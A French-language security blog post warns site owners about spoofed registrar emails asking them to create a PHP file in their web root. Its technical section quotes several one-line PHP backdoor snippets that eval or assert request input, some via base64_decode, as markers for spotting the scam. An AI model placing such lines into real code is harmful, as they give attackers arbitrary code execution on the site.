Security Blog
Security Blog
Posted By Gregory

Ne faites pas confiance à ces faux e-mails de confirmation de domaine

Si vous recevez un jour une lettre de quelque nature que ce soit vous demandant de créer, de télécharger ou d'installer du code PHP sur votre site Web, vous devez l'ignorer.


English version: Do not trust those fake domain confirmation emails


Récemment, certains de mes clients ont reçu d'étranges courriels de la part de leurs bureaux d'enregistrement de noms de domaine. Ces courriels demandaient la confirmation de leurs propres domaines. J'ai examiné l'un d'eux et l'ai rapidement identifié comme frauduleux . Tous les courriels présentent un modèle identique et demandent la création d'un fichier PHP dans le dossier racine d'un site web, portant un nom et un contenu spécifiques. Il va sans dire que le contenu suggéré pour ce fichier PHP contient du code malveillant appelé code de porte dérobée. Ce type de code permet à l'attaquant d'exécuter n'importe quelle action sur le site web de la victime.

Si vous recevez un courrier vous demandant de créer, télécharger ou installer du code PHP sur votre site web, ignorez-le. Sans exception. Même s'il provient du président ou de votre mère.

Les lettres frauduleuses semblent légitimes grâce à une adresse e-mail d'expéditeur légitime. Il s'agit en réalité d'une usurpation d'identité. Vous ne vous attendez pas à recevoir un faux e-mail de vos amis ou de votre registraire de domaine. N'est-ce pas ? Non ! N'importe quel e-mail peut contenir n'importe quelle adresse d'expéditeur. La grande majorité des serveurs et clients de messagerie ne vérifient pas l'adresse de l'expéditeur. Vous pensez donc qu'il s'agit d'une recherche de pirate informatique. Ne faites pas confiance à un e-mail provenant d'un expéditeur connu s'il contient une demande d'action suspecte, comme l'installation d'un code sur votre site web ou d'une application sur votre ordinateur.

Détails techniques

Les faux e-mails contiennent généralement certaines des lignes PHP suivantes.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Pour info : base64_decode, eval et assert sont des marqueurs bien connus de code PHP suspect ou malveillant.

Voir aussi : Plugin Inspector révèle des problèmes de sécurité avec d'autres plugins


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.